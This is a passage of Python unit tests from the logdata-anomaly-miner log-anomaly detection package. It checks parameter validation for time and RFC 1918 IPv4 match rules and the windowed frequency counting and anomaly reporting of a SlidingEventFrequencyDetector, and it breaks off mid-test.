self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [43200, 86401]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [43200]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [43200, 86401, 1]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: (43200, 86401)}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={None: [43200, 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: ["43200", 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [b"43200", 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [True, 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [{"id": "Default"}, 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [(43200,), 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [set(), 86400]}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[86400, 43200]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86401]) self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 86400) self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 86400, [], {}) self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 86400, None, None) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=["43200", 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[b"43200", 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[True, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[{"id": "Default"}, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[(43200,), 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[set(), 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=b"default") self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action="default") self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=True) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=123) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=123.3) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action={"id": "Default"}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=()) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=set()) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=[]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=b"default") self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo="default") self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=True) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=123) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=123.3) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo={"id": "Default"}) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=()) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=set()) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=[]) ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [model_syslog_time], {1550145600: [43200, 86400], 0: [1, 2]}, default_limit=[43200, 86400]) ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [], {}, default_limit=[43200, 86400]) ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, None, None, default_limit=[43200, 86400]) def test15IPv4InRFC1918MatchRule(self): """Test the IPv4InRFC1918MatchRule.""" t = time() match_ipv4 = "match/IPv4" ipv4mr = IPv4InRFC1918MatchRule(match_ipv4) private_addresses = [b"192.168.0.0", b"192.168.255.255", b"172.16.0.0", b"172.31.255.255", b"10.0.0.0", b"10.255.255.255"] public_addresses = [b"192.167.255.255", b"192.169.0.0", b"172.15.255.255", b"172.32.0.0", b"9.255.255.255", b"11.0.0.0"] fdme1 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme2 = DummyFixedDataModelElement("IPv4", b"192.168.0.1") for ip in private_addresses: fdme = DummyFixedDataModelElement("IPv4", ip) match_context = DummyMatchContext(ip) match_element = fdme.get_match_element("match", match_context) x = [int(x.decode()) for x in ip.split(b".")] match_element.match_object = int(x[0] * math.pow(256, 3) + x[1] * math.pow(256, 2) + x[2] * math.pow(256, 1) + x[3]) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, ipv4mr) self.assertTrue(ipv4mr.match(log_atom)) for ip in public_addresses: fdme = DummyFixedDataModelElement("IPv4", ip) match_context = DummyMatchContext(ip) match_element = fdme.get_match_element("match", match_context) x = [int(x.decode()) for x in ip.split(b".")] match_element.match_object = int(x[0] * math.pow(256, 3) + x[1] * math.pow(256, 2) + x[2] * math.pow(256, 1) + x[3]) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, ipv4mr) self.assertFalse(ipv4mr.match(log_atom)) self.assertRaises(ValueError, IPv4InRFC1918MatchRule, "") self.assertRaises(TypeError, IPv4InRFC1918MatchRule, b"default") self.assertRaises(TypeError, IPv4InRFC1918MatchRule, True) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, 123) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, 123.3) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, {"id": "Default"}) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, ()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, []) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, set()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, None) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=b"default") self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action="default") self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=True) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=123) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=123.3) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action={"id": "Default"}) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=set()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) IPv4InRFC1918MatchRule("default", egma) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/SlidingEventFrequencyDetectorTest.py000066400000000000000000001056221500476301700327720ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.SlidingEventFrequencyDetector import SlidingEventFrequencyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class SlidingEventFrequencyDetectorTest(TestBase): """Unittests for the SlidingEventFrequencyDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new frequencies. The sEFD is used with one path to be analyzed over four time windows. The frequencies do not change a lot in the first time windows, thus no anomalies are generated. Then, value frequencies change and anomalies are created in the last time windows. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # Initialize detector for analyzing values in one path in time windows of 10 seconds t = time.time() expected_string_first = '%s Frequency exceeds range for the first time\n%s: "None" (%d lines)\n %s\n\n' expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False) # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 7, None) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 17, None) log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 18, None) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 19, None) # Start of window 3: log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None) log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None) # Start of window 4: log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 35, None) sefd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+1]) sefd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+1, t+3]) sefd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t+7).strftime(dtf), sefd.__class__.__name__, 1, "a")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("/value",)]), [t+1, t+3, t+7]) sefd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+3, t+7, t+13]) sefd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+7, t+13, t+17]) sefd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+13, t+17, t+18]) sefd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+13, t+17, t+18, t+19]) sefd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+17, t+18, t+19, t+25]) sefd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t+17, t+18, t+19, t+25, t+25]) sefd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+25).strftime(dtf), sefd.__class__.__name__, 1, "b")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("/value",)]), [t+25, t+25, t+35]) # target_path_list sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False) # Forward log atoms to detector # Log atoms of initial window 1 should not create anomalies and add to counts # Input: a; initial time window is started # Expected output: frequency of a is 1 sefd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("a",)]), [t + 1]) # Input: b; initial time window is not finished # Expected output: frequency of b is 1 added to existing count sefd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("a",)]), [t + 1]) self.assertEqual(list(sefd.counts[("b",)]), [t + 3]) # Input: a; initial time window is not finished # Expected output: frequency of a is 2 replaces a in existing count sefd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() self.assertEqual(list(sefd.counts[("a",)]), [t + 1, t + 7]) self.assertEqual(list(sefd.counts[("b",)]), [t + 3]) # Time window 2 should not create anomalies since a is in confidence (3 vs 2 occurrences) and b is identical (1 occurrence). # Input: a; initial time window is completed, second time window is started # Expected output: frequency of a is 1 in new time window count, old count remains unchanged sefd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("a",)]), [t + 7, t + 13]) self.assertEqual(list(sefd.counts[("b",)]), [t + 3]) # Input: b; second time window is not finished # Expected output: frequency of b is 1 in new time window count, old count remains unchanged sefd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("a",)]), [t + 7, t + 13]) self.assertEqual(list(sefd.counts[("b",)]), [t + 3, t + 17]) # Input: a; second time window is not finished # Expected output: frequency of a is 3 in new time window count, old count remains unchanged sefd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18]) self.assertEqual(list(sefd.counts[("b",)]), [t + 3, t + 17]) # Input: a; second time window is not finished # Expected output: frequency of a is 4 in new time window count, old count remains unchanged sefd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t+19).strftime(dtf), sefd.__class__.__name__, 1, "a")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18, t + 19]) self.assertEqual(list(sefd.counts[("b",)]), [t + 3, t + 17]) # Time window 3 should create 2 anomalies since a drops from 3 to 0 and b increases from 1 to 2, which will be reported in window 4. # Anomalies are only reported when third time window is known to be completed, which will occur when subsequent atom is received. # Input: b; second time window is completed, third time window is started # Expected output: frequency of b is 1 in new time window count, old count remains unchanged sefd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18, t + 19]) self.assertEqual(list(sefd.counts[("b",)]), [t + 17, t + 25]) # Input: b; third time window is not finished # Expected output: frequency of b is 2 in new time window count, old count remains unchanged sefd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t+25).strftime(dtf), sefd.__class__.__name__, 1, "b")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18, t + 19]) self.assertEqual(list(sefd.counts[("b",)]), [t + 17, t + 25, t + 25]) # Time window 4 should not create anomalies since no log atom is received to evaluate it. # Input: a; third time window is completed, fourth time window is started # Expected output: Anomalies for unexpected low counts of a (0 instead of 3) and b (2 instead of 1), frequency of a is 1 in new # time window count, old count remains unchanged sefd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+19).strftime(dtf), sefd.__class__.__name__, 1, "a")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("a",)]), [t + 35]) self.assertEqual(list(sefd.counts[("b",)]), [t + 17, t + 25, t + 25]) # stop_learning_time sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(sefd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertTrue(sefd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertFalse(sefd.learn_mode) # stop_learning_no_anomaly_time sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(sefd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertTrue(sefd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(sefd.receive_atom(log_atom2)) self.assertTrue(sefd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(sefd.receive_atom(log_atom3)) self.assertTrue(sefd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertFalse(sefd.learn_mode) def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, ["default"], 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, None, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, "", 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, b"Default", 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, True, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, 123, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, 123.3, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, {"id": "Default"}, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, (), 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, set(), 300) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], -1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], "123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 100.22) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, window_size=100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, window_size=0.5) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=1.1) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=0) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=0.5) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=None) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id="Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=b"True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode="True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=None) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=b"True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline="True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=True) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=[""]) 